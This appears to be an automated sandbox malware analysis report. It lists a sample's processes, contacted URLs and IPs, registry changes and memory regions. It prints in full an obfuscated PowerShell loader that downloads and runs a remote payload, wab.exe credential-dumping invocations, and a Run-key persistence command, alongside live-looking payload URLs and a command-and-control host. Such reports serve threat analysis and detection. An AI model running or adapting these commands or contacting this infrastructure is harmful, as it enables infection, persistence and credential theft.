"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
malicious
C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
malicious
C:\Windows\SysWOW64\clip.exe
"C:\Windows\SysWOW64\clip.exe"
malicious
C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 23 hidden processes, click here to show them.

URLs

Name
IP
Malicious
jgbours284hawara01.duckdns.org
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
https://duelvalenza.it/FIPWKWOaFXJGe178.bin
46.254.34.12
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
46.254.34.12
http://geoplugin.net/json.gpf
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://aka.ms/pscore6lBcq
unknown
http://crl.microD
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://www.nirsoft.net
unknown
https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin
unknown
http://europrotectie.ro
unknown
https://europrotectie.ro/Methink1.thnXRwl
unknown
http://geoplugin.net/json.gp0B8
unknown
https://europrotectie.ro/Methink1.thn
188.212.111.134
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://duelvalenza.it/
unknown
https://duelvalenza.it/FIPWKWOaFXJGe178.binq(
unknown
https://www.google.com
unknown
http://87.121.108
unknown
https://europrotectie.ro
unknown
http://87.121.105.163/Detentionen.javaXRwl
unknown
http://crl.micro
unknown
http://geoplugin.net/json.gp)B
unknown
https://europrotectie.ro/Methink1.thnP
unknown
http://87.121.105.163/PUzAKuQ35.bin
87.121.105.163
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==
137.220.252.40
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://87.121.105.163/Detentionen.javaXRwl4
unknown
https://aka.ms/pscore68
unknown
http://www.nirsoft.net/
unknown
http://www.imvu.comata
unknown
http://crl.mM5
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
http://87.121.105.163/Detentionen.java
87.121.105.163
http://www.ebuddy.com
unknown
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jgbours284hawara01.duckdns.org
45.88.90.110
malicious
www.duelvalenza.it
unknown
malicious
www.led-svitidla.eu
unknown
malicious
www.387mfyr.sbs
137.220.252.40
led-svitidla.eu
37.235.104.9
europrotectie.ro
188.212.111.134
geoplugin.net
178.237.33.50
duelvalenza.it
46.254.34.12

IPs

IP
Domain
Country
Malicious
45.88.90.110
jgbours284hawara01.duckdns.org
Bulgaria
malicious
188.212.111.134
europrotectie.ro
Romania
137.220.252.40
www.387mfyr.sbs
Singapore
87.121.105.163
unknown
Bulgaria
178.237.33.50
geoplugin.net
Netherlands
46.254.34.12
duelvalenza.it
Italy

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Vibeka
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
bynkefugls
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
DJNLOJ3PER
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Quicker
Savvy
HKEY_CURRENT_USER\Environment
Pneumatorrhachis
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
exepath
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
licence
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Clouters
Slapperne
HKEY_CURRENT_USER\Environment
Deciduate
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 38 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
23690000
unclassified section
page execute and read and write
malicious
2E00000
system
page execute and read and write
malicious
5DFF000
trusted library allocation
page read and write
malicious
8980000
direct allocation
page execute and read and write
malicious
A67A000
direct allocation
page execute and read and write
malicious
44E0000
unkown
page execute and read and write
malicious
8830000
direct allocation
page execute and read and write
malicious
D40000
trusted library allocation
page read and write
malicious
902B000
direct allocation
page execute and read and write
malicious
5A41000
trusted library allocation
page read and write
malicious
D00000
trusted library allocation
page read and write
malicious
460000
system
page execute and read and write
malicious
F40000
system
page execute and read and write
malicious
5A14000
trusted library allocation
page read and write
malicious
647C000
heap
page read and write
malicious
214A36AE000
trusted library allocation
page read and write
malicious
647C000
heap
page read and write
malicious
C01000
heap
page read and write
1ACAF930000
heap
page read and write
1A47E66E000
heap
page read and write
225A1000
heap
page read and write
967000
heap
page read and write
1A47E5D3000
heap
page read and write
C01000
heap
page read and write
4B51000
trusted library allocation
page read and write
2908000
heap
page read and write
E98000
heap
page read and write
1A47E8A5000
heap
page read and write
C01000
heap
page read and write
53C0000
trusted library allocation
page read and write
4839000
trusted library allocation
page read and write
5FBE000
stack
page read and write
22211000
direct allocation
page execute and read and write
22849000
heap
page read and write
81A0000
trusted library allocation
page execute and read and write
2F60000
heap
page read and write
221FE000
stack
page read and write
8A4000
heap
page read and write
C01000
heap
page read and write
C01000
heap
page read and write
5B51000
trusted library allocation
page read and write
2149584A000
trusted library allocation
page read and write
E3E000
stack
page read and write
7234000
heap
page read and write
64AF000
heap
page read and write
37B0000
heap
page read and write
4EB7000
trusted library allocation
page read and write
89E000
heap
page read and write
6756000
heap
page read and write
73CC000
heap
page read and write
2A839CE000
stack
page read and write
C01000
heap
page read and write
492E000
stack
page read and write
219609E0000
heap
page read and write
2149583E000
trusted library allocation
page read and write
31B0000
heap
page read and write
4BD3000
heap
page read and write
73B0000
trusted library allocation
page execute and read and write
82B7000
trusted library allocation
page read and write
5460000
trusted library allocation
page read and write
F90000
unkown
page readonly
F5223FB000
stack
page read and write
78A0000
trusted library allocation
page read and write
2227E000
stack
page read and write
5B79000
trusted library allocation
page read and write
707C000
stack
page read and write
13D1000
unkown
page readonly
F4A000
stack
page read and write
3547000
heap
page read and write
774E000
stack
page read and write
5F40000
heap
page read and write
F6A000
trusted library allocation
page execute and read and write
2A828FE000
stack
page read and write
3490000
heap
page read and write
2DCF000
stack
page read and write
459000
system
page execute and read and write
1360000
unkown
page read and write
21C3E000
stack
page read and write
C01000
heap
page read and write
3498000
heap
page read and write
47D1000
direct allocation
page execute and read and write
C00000
heap
page read and write
A8E000
stack
page read and write
25379EEB000
heap
page read and write
6F30000
direct allocation
page read and write
AC8000
heap
page read and write
1ACAF990000
heap
page read and write
4BD8000
heap
page read and write
220DE000
direct allocation
page execute and read and write
3055000
heap
page read and write
2149411F000
trusted library allocation
page read and write
4E5E000
stack
page read and write
2A83ACA000
stack
page read and write
214ABAD0000
heap
page execute and read and write
2E96000
stack
page read and write
F523BFE000
stack
page read and write
C01000
heap
page read and write
2537BA11000
trusted library allocation
page read and write
323A000
stack
page read and write
77B7000
trusted library allocation
page read and write
3054000
heap
page read and write
840000
heap
page read and write
AC0000
heap
page read and write
4BD0000
heap
page read and write
84D5000
trusted library allocation
page read and write
5A06000
trusted library allocation
page read and write
5127000
trusted library allocation
page read and write
89C0000
direct allocation
page read and write
8545000
heap
page read and write
4FC2000
trusted library allocation
page read and write
6410000
heap
page read and write
4BB0000
heap
page read and write
58B2000
heap
page read and write
2261A000
heap
page read and write
34CF000
heap
page read and write
9A2B000
direct allocation
page execute and read and write
73E0000
heap
page read and write
4A7E000
stack
page read and write
9C7A000
direct allocation
page execute and read and write
FD0000
trusted library section
page read and write
4BE0000
heap
page read and write
75E0000
trusted library allocation
page read and write
4BF6000
heap
page read and write
4BC0000
heap
page read and write
7820000
trusted library allocation
page read and write
33D0000
heap
page read and write
7340000
heap
page read and write
86B0000
trusted library allocation
page execute and read and write
61FC000
heap
page read and write
4F82000
trusted library allocation
page read and write
22C90000
unclassified section
page execute and read and write
65E000
stack
page read and write
73E8000
heap
page read and write
F4D000
trusted library allocation
page execute and read and write
73D0000
heap
page read and write
3434000
heap
page read and write
7622000
heap
page read and write
21494108000
trusted library allocation
page read and write
25FD000
stack
page read and write
893D000
stack
page read and write
C01000
heap
page read and write
2537B900000
trusted library allocation
page read and write
2B88000
heap
page read and write
C01000
heap
page read and write
D2F000
heap
page read and write
4842000
direct allocation
page execute and read and write
214A3937000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
6C0000
heap
page read and write
462D000
direct allocation
page execute and read and write
21491B40000
heap
page read and write
29A0000
unkown
page readonly
2537BBA9000
trusted library allocation
page read and write
CE0000
heap
page read and write
5EE000
stack
page read and write
222E1000
direct allocation
page execute and read and write
F75000
trusted library allocation
page execute and read and write
400000
system
page execute and read and write
58D7000
heap
page read and write
4BB1000
heap
page read and write
C01000
heap
page read and write
2537BBC4000
trusted library allocation
page read and write
3547000
heap
page read and write
12FC000
stack
page read and write
2537B6F0000
trusted library allocation
page read and write
21940000
direct allocation
page read and write
537C000
stack
page read and write
4AAE000
stack
page read and write
83EE000
stack
page read and write
C01000
heap
page read and write
C30000
unkown
page readonly
49AE000
stack
page read and write
C01000
heap
page read and write
3540000
heap
page read and write
343E000
stack
page read and write
59D1000
heap
page read and write
C78000
heap
page read and write
2D2E000
stack
page read and write
C01000
heap
page read and write
3582000
heap
page read and write
4BF0000
heap
page read and write
214AB646000
heap
page read and write
22829000
heap
page read and write
22785000
heap
page read and write
852E000
stack
page read and write
49D1000
trusted library allocation
page read and write
820D000
stack
page read and write
647C000
heap
page read and write
9FC000
stack
page read and write
2B80000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
7636000
trusted library allocation
page read and write
770D000
stack
page read and write
25A5000
heap
page read and write
8FA000
stack
page read and write
3581000
heap
page read and write
6710000
direct allocation
page read and write
684000
heap
page read and write
4BC7000
heap
page read and write
2B30000
heap
page read and write
291C000
stack
page read and write
3320000
heap
page read and write
862F000
stack
page read and write
1A47E679000
heap
page read and write
C01000
heap
page read and write
7720000
trusted library allocation
page read and write
4BD0000
heap
page read and write
C01000
heap
page read and write
50EF3FE000
unkown
page read and write
E00000
trusted library allocation
page read and write
82F0000
heap
page read and write
38C6000
heap
page read and write
D21000
heap
page read and write
28B0000
heap
page read and write
8280000
heap
page read and write
C01000
heap
page read and write
725F000
stack
page read and write
1A47E5BE000
heap
page read and write
28DF000
unkown
page read and write
CB0000
unkown
page read and write
6503000
heap
page read and write
4BD5000
heap
page read and write
21EC0000
remote allocation
page read and write
2B77000
heap
page read and write
2EAF000
stack
page read and write
561F000
heap
page read and write
1A47EC40000
heap
page read and write
4BB1000
heap
page read and write
496F000
stack
page read and write
C30000
unkown
page readonly
49B0000
heap
page read and write
4BD1000
heap
page read and write
7680000
heap
page execute and read and write
70FC000
stack
page read and write
7FF8490D0000
trusted library allocation
page read and write
2DE0000
heap
page read and write
4840000
trusted library allocation
page read and write
4BF6000
heap
page read and write
1A47E590000
heap
page read and write
21491BE3000
heap
page read and write
1A47E5E2000
heap
page read and write
6DD5000
heap
page execute and read and write
BFF000
stack
page read and write
21F1E000
stack
page read and write
C01000
heap
page read and write
2A20000
heap
page read and write
1A47E5BF000
heap
page read and write
2A8297C000
stack
page read and write
2217E000
stack
page read and write
21491B80000
heap
page read and write
1A47E65B000
heap
page read and write
211D0000
direct allocation
page read and write
C37000
stack
page read and write
7CD000
stack
page read and write
2EB2000
stack
page read and write
21970000
direct allocation
page read and write
C0000
unkown
page readonly
29D0000
heap
page read and write
FC8000
trusted library allocation
page read and write
87AB000
stack
page read and write
E20000
trusted library allocation
page execute and read and write
298E000
stack
page read and write
21DDF000
stack
page read and write
7110000
heap
page read and write
219BE000
stack
page read and write
CE000
unkown
page readonly
21170000
direct allocation
page read and write
77E000
stack
page read and write
771B000
heap
page read and write
C01000
heap
page read and write
8677000
heap
page read and write
4BAC000
trusted library allocation
page read and write
220FE000
stack
page read and write
8950000
trusted library allocation
page read and write
CC1000
unkown
page readonly
C01000
heap
page read and write
1340000
unkown
page readonly
7580000
trusted library allocation
page read and write
4C8E000
stack
page read and write
2EB4000
stack
page read and write
4918000
trusted library allocation
page read and write
2DA0000
heap
page read and write
709D000
stack
page read and write
21491B10000
heap
page read and write
48CC000
stack
page read and write
5A33000
trusted library allocation
page read and write
54B3000
trusted library allocation
page read and write
C7E000
stack
page read and write
355B000
heap
page read and write
26E9000
stack
page read and write
3200000
